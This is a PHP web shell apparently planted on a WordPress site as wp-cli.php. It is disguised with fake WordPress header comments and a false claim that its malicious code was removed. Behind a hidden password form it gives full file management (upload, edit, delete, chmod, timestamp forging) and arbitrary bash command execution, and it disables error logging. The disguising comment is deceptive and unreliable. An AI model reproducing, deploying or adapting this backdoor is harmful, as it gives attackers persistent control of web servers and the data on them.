File: /home/corofmbe/public_html/wp-cli.php
<?php
/**
* WordPress Plugin Administration API
*
* @package WordPress
* @subpackage Administration
*
* Parses the plugin contents to retrieve plugin's metadata.
*
* All plugin headers must be on their own line. Plugin description must not have
* any newlines, otherwise only parts of the description will be displayed.
* The below is formatted for printing.
/** Load WordPress Administration Bootstrap
* @package Haxor.Group
* @copyright Copyright (C) 2023 - 2024 Open Source Matters, Inc. All rights reserved.
*
*/
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
if (isset($_GET['i'])) {
header("Content-Type: image/png");
echo "\x89PNG\r\n\x1a\n";
exit;
}
session_start();
function is_logged_in() {
return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true;
}
if (isset($_POST['password'])) {
$entered_password = $_POST['password'];
$hashed_password = '$2a$12$Da.IplHbE/NlbKqmykWgg.AYgNyV2n9IAx4AGknn7wgzeTc8gySyu';
if (password_verify($entered_password, $hashed_password)) {
$_SESSION['logged_in'] = true;
$_SESSION['SAP'] = 'biadap';
header("Location: " . $_SERVER['PHP_SELF']);
exit;
} else {
echo "Incorrect password.";
}
}
if (is_logged_in()) {
error_reporting(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
session_start();
@set_time_limit(0);
define('_B_', realpath(isset($_GET['_r']) ? $_GET['_r'] : getcwd()));
chdir(_B_);
function _g($p){ return realpath($p); }
function _p($f){ return substr(sprintf('%o', fileperms($f)), -4); }
function _pm($f){
$m = fileperms($f);
$s = ($m & 0x4000) ? 'd' : '-';
$x = [0x0100=>'r', 0x0080=>'w', 0x0040=>'x', 0x0020=>'r', 0x0010=>'w', 0x0008=>'x', 0x0004=>'r', 0x0002=>'w', 0x0001=>'x'];
foreach($x as $b=>$c){ $s .= ($m & $b) ? $c : '-'; }
return $s;
}
function _go(){ header('Location:?_r='.urlencode(_B_)); exit; }
if(isset($_GET['_x'])){
$t = _g($_GET['_x']);
if(is_file($t)) unlink($t);
elseif(is_dir($t)) rmdir($t);
_go();
}
if(isset($_POST['_rf'], $_POST['_rt'])){
rename(_g($_POST['_rf']), dirname($_POST['_rf']).'/'.$_POST['_rt']);
_go();
}
if(isset($_POST['_cp'], $_POST['_cm'])){
chmod(_g($_POST['_cp']), intval($_POST['_cm'], 8));
_go();
}
if(isset($_POST['_ep'], $_POST['_ed'])){
file_put_contents($_POST['_ep'], $_POST['_ed']);
echo "<div style='color:lime'>\u2713 Saved</div>";
}
if(!empty($_FILES['_uf'])){
move_uploaded_file($_FILES['_uf']['tmp_name'], _B_.'/'.$_FILES['_uf']['name']);
echo "<div style='color:lime'>\u2713 Uploaded</div>";
}
if(isset($_POST['_mkdir']) && $_POST['_mkdir']){
$folder = basename(trim($_POST['_mkdir']));
@mkdir(_B_ . '/' . $folder);
_go();
}
if(isset($_POST['_mkfile']) && $_POST['_mkfile']){
$file = basename(trim($_POST['_mkfile']));
$path = _B_ . '/' . $file;
if (!file_exists($path)) file_put_contents($path, '');
_go();
}
if(isset($_POST['_tp'], $_POST['_tm'])){
@touch(_g($_POST['_tp']), strtotime($_POST['_tm']));
_go();
}
$__ = '';
if (isset($_POST['_sh'])) {
$cmd = $_POST['_sh'];
ob_start();
if (stristr(PHP_OS, 'WIN')) {
system($cmd);
} else {
putenv('PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin');
$pipes = [];
$process = proc_open("/bin/bash", [["pipe", "r"], ["pipe", "w"], ["pipe", "w"]], $pipes);
if (is_resource($process)) {
fwrite($pipes[0], $cmd . "\n"); fclose($pipes[0]);
echo stream_get_contents($pipes[1]); fclose($pipes[1]);
echo stream_get_contents($pipes[2]); fclose($pipes[2]);
proc_close($process);
} else {
echo "\u274C Failed to open bash shell.";
}
}
$__ = ob_get_clean();
}
$__dir = $__file = [];
foreach(scandir(_B_) as $_){
if($_=='.') continue;
$p = _B_.'/'.$_;
is_dir($p) ? $__dir[] = $_ : $__file[] = $_;
}
?><!DOCTYPE html><html><head>
<meta charset="utf-8">
<title></title>
<style>
body{background:#111;color:#ccc;font:12px monospace;}
a{color:#02ff00;text-decoration:none;}
input,button,textarea{background:#1d1d1d;color:#ccc;border:1px solid #333;padding:3px;}
table{width:100%;border-collapse:collapse;margin-top:10px;}
td,th{border:1px solid #333;padding:4px;}
</style></head><body>
<h3># Kiebo File Manager<br># version : v.1.0/2025<br># Happy bypassing :)</h3>
<h3>📠PATH:
<?php
$z = explode(DIRECTORY_SEPARATOR, _B_);
$p = PHP_OS_FAMILY === 'Windows' ? '' : '/';
foreach ($z as $i) {
if ($i === '') continue;
$p .= $i . '/';
echo "<a href='?_r=" . urlencode($p) . "'>/$i</a>";
}
?>
</h3>
<!-- Change Dir Manual Input -->
<form method="get" style="margin:10px 0;">
<input type="text" name="_r" placeholder="Contoh: /home/username/public_html/wp-content" style="width:60%;">
<button>ðŸâ€Â Change Dir</button>
</form>
<form method="post" enctype="multipart/form-data">
<input type="file" name="_uf"><button>Upload</button></form>
<form method="post" style="margin-top:10px;">
<input name="_sh" style="width:60%" placeholder="Execute Shell">
<button>Run</button></form>
<form method="post" style="margin-top:10px;">
<input name="_mkdir" placeholder="New Folder Name">
<button>Create Folder</button></form>
<form method="post" style="margin-top:10px;">
<input name="_mkfile" placeholder="New File Name">
<button>Create File</button></form>
<?php if($__): ?><pre><?=htmlspecialchars($__)?></pre><?php endif; ?>
<table>
<tr><th>Name</th><th>Type</th><th>Size</th><th>Perm</th><th>Modified</th><th>Action</th></tr>
<?php foreach($__dir as $_): $p=_g(_B_.'/'.$_); ?>
<tr>
<td><a href="?_r=<?=urlencode($p)?>">📠<?=htmlspecialchars($_)?></a></td>
<td>DIR</td><td>-</td><td><?=_pm($p)?></td><td><?=date('Y-m-d H:i:s', filemtime($p))?></td>
<td>
<form method="post" style="display:inline;"><input type="hidden" name="_rf" value="<?=$p?>"><input name="_rt" placeholder="Rename"><button>R</button></form>
<form method="post" style="display:inline;"><input type="hidden" name="_cp" value="<?=$p?>"><input name="_cm" size="4" placeholder="<?= _p($p) ?>"><button>C</button></form>
<form method="post" style="display:inline;"><input type="hidden" name="_tp" value="<?=$p?>"><input name="_tm" placeholder="<?=date('Y-m-d H:i:s', filemtime($p))?>"><button>T</button></form>
<a href="?_x=<?=urlencode($p)?>&_r=<?=urlencode(_B_)?>">Delete</a>
</td></tr>
<?php endforeach; ?>
<?php foreach($__file as $_): $p=_g(_B_.'/'.$_); ?>
<tr>
<td><a href="?_r=<?=urlencode(_B_)?>&e=<?=urlencode($p)?>">📄 <?=htmlspecialchars($_)?></a></td>
<td>FILE</td><td><?=filesize($p)?> B</td><td><?=_pm($p)?></td><td><?=date('Y-m-d H:i:s', filemtime($p))?></td>
<td>
<form method="post" style="display:inline;"><input type="hidden" name="_rf" value="<?=$p?>"><input name="_rt" placeholder="Rename"><button>R</button></form>
<form method="post" style="display:inline;"><input type="hidden" name="_cp" value="<?=$p?>"><input name="_cm" size="4" placeholder="<?= _p($p) ?>"><button>C</button></form>
<form method="post" style="display:inline;"><input type="hidden" name="_tp" value="<?=$p?>"><input name="_tm" placeholder="<?=date('Y-m-d H:i:s', filemtime($p))?>"><button>T</button></form>
<a href="?_x=<?=urlencode($p)?>&_r=<?=urlencode(_B_)?>">Delete</a>
</td></tr>
<?php endforeach; ?>
</table>
<?php if(!empty($_GET['e'])):
$fp=_g($_GET['e']);if(is_file($fp)):
$ct=htmlspecialchars(file_get_contents($fp)); ?>
<h4>Edit: <?=basename($fp)?></h4>
<form method="post">
<input type="hidden" name="_ep" value="<?=$fp?>">
<textarea name="_ed" rows="20" cols="80"><?=$ct?></textarea><br>
<button>💾 Save</button>
</form>
<?php endif; endif; ?>
</body></html>
<?php
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title><?php echo "https://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; ?></title>
<style>
html, body {
background: linear-gradient(135deg, #000000, #00000);
margin: 0;
padding: 0;
font-family: "Segoe UI", Tahoma, sans-serif;
height: 100%;
}
/* Overlay dengan efek warna & blur */
.login-container {
position: fixed;
inset: 0;
background: linear-gradient(135deg, rgba(24,90,157,0.85), rgba(67,206,162,0.85));
backdrop-filter: blur(12px);
-webkit-backdrop-filter: blur(12px);
display: flex;
justify-content: center;
align-items: center;
animation: fadeIn 0.6s ease;
z-index: 1000;
}
/* Box form elegan */
.login-form {
background: rgba(255, 255, 255, 0.15);
backdrop-filter: blur(20px);
-webkit-backdrop-filter: blur(20px);
padding: 35px 30px;
border-radius: 16px;
width: 320px;
box-shadow: 0 8px 40px rgba(0, 0, 0, 0.2);
text-align: center;
color: #fff;
transform: translateY(-20px);
animation: slideUp 0.6s ease forwards;
border: 1px solid rgba(255, 255, 255, 0.2);
}
.login-form h2 {
margin-bottom: 25px;
font-weight: 600;
color: #fff;
letter-spacing: 1px;
}
.login-form input[type="password"] {
width: 100%;
padding: 12px;
margin-bottom: 20px;
font-size: 14px;
border: none;
border-radius: 8px;
outline: none;
background: rgba(255, 255, 255, 0.2);
color: #fff;
transition: all 0.3s ease;
}
.login-form input[type="password"]::placeholder {
color: rgba(255, 255, 255, 0.7);
}
.login-form input[type="password"]:focus {
background: rgba(255, 255, 255, 0.3);
box-shadow: 0 0 8px rgba(255,255,255,0.4);
}
.login-form button {
width: 100%;
padding: 12px;
background: linear-gradient(135deg, #43cea2, #185a9d);
color: white;
border: none;
border-radius: 8px;
font-size: 15px;
cursor: pointer;
transition: all 0.3s ease;
}
.login-form button:hover {
background: linear-gradient(135deg, #56f0ba, #2176c4);
box-shadow: 0 0 15px rgba(86,240,186,0.6);
}
.hidden {
display: none;
}
.hint {
position: fixed;
bottom: 15px;
right: 15px;
font-size: 12px;
color: #eee;
background: rgba(0, 0, 0, 0.6);
padding: 6px 10px;
border-radius: 6px;
font-family: monospace;
}
.error-msg {
color: #ff8080;
font-size: 13px;
margin-bottom: 15px;
}
@keyframes fadeIn {
from { opacity: 0; }
to { opacity: 1; }
}
@keyframes slideUp {
from { transform: translateY(50px); opacity: 0; }
to { transform: translateY(0); opacity: 1; }
}
</style>
</head>
<body>
<?php if (!is_logged_in()): ?>
<div class="login-container hidden" id="loginContainer">
<div class="login-form">
<h2>#RAHASIA NEGARA</h2>
<?php if (!empty($error)): ?>
<div class="error-msg"><?= htmlspecialchars($error) ?></div>
<?php endif; ?>
<form method="POST" action="">
<input type="password" name="password" id="password" placeholder="Enter password" required>
<button type="submit">Login</button>
</form>
</div>
</div>
<script>
document.addEventListener('keydown', function(event) {
if (event.key === 'Delete') {
const container = document.getElementById('loginContainer');
container.classList.remove('hidden');
document.getElementById('password').focus();
}
});
</script>
<?php endif; ?>
</body>
</html>